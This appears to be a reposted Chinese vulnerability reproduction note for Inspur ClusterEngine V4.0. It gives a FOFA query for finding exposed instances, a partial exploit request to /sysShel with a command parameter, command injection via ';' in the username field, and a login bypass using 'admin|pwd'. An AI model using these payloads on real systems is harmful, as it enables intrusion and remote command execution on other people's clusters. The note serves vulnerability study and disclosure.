浪潮 ClusterEngineV4.0 任意命令執行


1、浪潮ClusterEngineV4.0 任意命令執行

影響版本 ClusterEngineV4.0

2、漏洞影響

遠程代碼執行

3、復現

fofa語句 title='TSCEV4.0'

 

 抓包構造exp

 

 

POST /sysShel

......

op=doPlease&node=cu01&command=ls

 

4、username遠程代碼執行

登錄抓包,閉合username參數

 

使用;進行命令分割

 

 5、任意用戶登錄

用戶名輸入admin|pwd,密碼任意

 

 成功登錄

 

 

 6、參考鏈接

https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

https://blog.csdn.net/DUANYU23/article/details/115499280

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM